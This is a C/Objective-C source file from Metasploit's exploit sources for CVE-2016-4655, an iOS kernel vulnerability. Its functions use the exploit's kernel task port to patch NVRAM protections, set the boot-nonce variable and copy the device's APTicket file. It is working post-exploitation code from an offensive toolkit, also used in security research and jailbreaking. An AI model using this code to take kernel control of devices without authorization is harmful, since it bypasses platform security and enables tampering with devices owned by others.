GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2016-4655/set.m
/*
* set.m - High-level handler to set boot nonce
*
* Copyright (c) 2017 Siguza & tihmstar
*/
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <mach/mach.h>
#include <IOKit/IOKitLib.h>
#include <CoreFoundation/CoreFoundation.h>

#include "arch.h"
#include "exploit64.h"
#include "nvpatch.h"
#include "set.h"
/*
 * Make sure this process may write the boot-nonce NVRAM variable.
 *
 * When the process already runs as uid 0 nothing is done and 0 is returned.
 * Otherwise the kernel task port is fetched via get_kernel_task() and, if it
 * is a valid Mach port, nvpatch() is run for "com.apple.System.boot-nonce"
 * and its result is returned as-is. -1 means no usable kernel task port was
 * obtained.
 *
 * @return 0 on success, -1 if the kernel task port is invalid, otherwise
 *         whatever nvpatch() returned.
 */
static int party_hard(void)
{
    // Already root: nothing to do.
    if(getuid() == 0)
    {
        return 0;
    }

    vm_address_t kbase = 0;
    task_t ktask = get_kernel_task(&kbase);
    LOG("kernel_task: 0x%x", ktask);

    if(!MACH_PORT_VALID(ktask))
    {
        return -1;
    }
    return nvpatch(ktask, kbase, "com.apple.System.boot-nonce");
}
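/*
 * Write `gen` into the "com.apple.System.boot-nonce" NVRAM variable.
 *
 * A CFDictionary {boot-nonce: gen} is built, the IODTNVRAM service is looked
 * up, party_hard() is run to obtain the privileges the write needs, and the
 * dictionary is applied with IORegistryEntrySetCFProperties().
 *
 * @param gen  NUL-terminated UTF-8 string. It is wrapped without copying
 *             (kCFAllocatorNull), so it must stay valid for the whole call.
 *             NULL is rejected and logged instead of being handed to CF.
 * @return true if the kernel reported KERN_SUCCESS for the property write,
 *         false on any failure. All CF objects and the IOKit service port
 *         created here are released on every path (the original leaked the
 *         surviving CF object on partial allocation failure and never
 *         released the io_service_t).
 */
bool set_generator(const char *gen)
{
    bool ret = false;

    // Guard the NoCopy wrapper against a NULL C string; a NULL str then takes the
    // same "allocation failed" path as a genuine CF failure.
    CFStringRef str = (gen != NULL) ? CFStringCreateWithCStringNoCopy(NULL, gen, kCFStringEncodingUTF8, kCFAllocatorNull) : NULL;
    CFMutableDictionaryRef dict = CFDictionaryCreateMutable(NULL, 0, &kCFCopyStringDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
    if(!str || !dict)
    {
        LOG("Failed to allocate CF objects");
        // Release whichever object did get created; CFRelease(NULL) is not permitted.
        if(str)
        {
            CFRelease(str);
        }
        if(dict)
        {
            CFRelease(dict);
        }
        return ret;
    }

    // kCFTypeDictionaryValueCallBacks retains str, so our own reference can be dropped here.
    CFDictionarySetValue(dict, CFSTR("com.apple.System.boot-nonce"), str);
    CFRelease(str);

    io_service_t nvram = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IODTNVRAM"));
    if(!MACH_PORT_VALID(nvram))
    {
        LOG("Failed to get IODTNVRAM service");
    }
    else
    {
        if(party_hard() == 0)
        {
            kern_return_t kret = IORegistryEntrySetCFProperties(nvram, dict);
            LOG("IORegistryEntrySetCFProperties: %s", mach_error_string(kret));
            ret = (kret == KERN_SUCCESS);
        }
        // IOServiceGetMatchingService hands back a reference the caller owns.
        IOObjectRelease(nvram);
    }

    CFRelease(dict);
    return ret;
}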
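/*
 * Copy /System/Library/Caches/apticket.der to `to`.
 *
 * party_hard() is run first to obtain the privileges needed to read the
 * source. The file is then sized with stat(), read into a single buffer and
 * written out with one fwrite().
 *
 * @param to  Destination path; opened with "wb" (created or truncated).
 * @return true only if every step succeeded: the read and write transferred
 *         the full st_size bytes and fclose() of the destination (which
 *         flushes it) reported success. The original left the fread/fwrite
 *         and fclose results unchecked, so a short copy was reported as
 *         success. Failures are LOG'd with strerror(errno) where applicable.
 */
bool dump_apticket(const char *to)
{
    bool ret = false;

    if(party_hard() != 0)
    {
        return ret;
    }

    const char *from = "/System/Library/Caches/apticket.der";
    struct stat s;
    if(stat(from, &s) != 0)
    {
        LOG("stat failed: %s", strerror(errno));
        return ret;
    }
    // st_size is a signed off_t; never let a negative value become a huge size_t.
    if(s.st_size < 0)
    {
        LOG("invalid src size");
        return ret;
    }
    size_t len = (size_t)s.st_size;

    FILE *in = fopen(from, "rb");
    if(in == NULL)
    {
        LOG("failed to open src: %s", strerror(errno));
        return ret;
    }

    FILE *out = fopen(to, "wb");
    if(out == NULL)
    {
        LOG("failed to open dst: %s", strerror(errno));
        goto out_close_in;
    }

    char *buf = malloc(len);
    if(buf == NULL)
    {
        LOG("failed to alloc buf: %s", strerror(errno));
        goto out_close_out;
    }

    // Element size 1 so the return value is the byte count and a short transfer is visible.
    if(fread(buf, 1, len, in) != len)
    {
        LOG("short read from src: %s", strerror(errno));
    }
    else if(fwrite(buf, 1, len, out) != len)
    {
        LOG("short write to dst: %s", strerror(errno));
    }
    else
    {
        ret = true;
    }
    free(buf);

out_close_out:
    // fclose() flushes buffered output; if that fails the copy on disk is incomplete.
    if(fclose(out) != 0)
    {
        LOG("failed to close dst: %s", strerror(errno));
        ret = false;
    }
out_close_in:
    fclose(in);
    return ret;
}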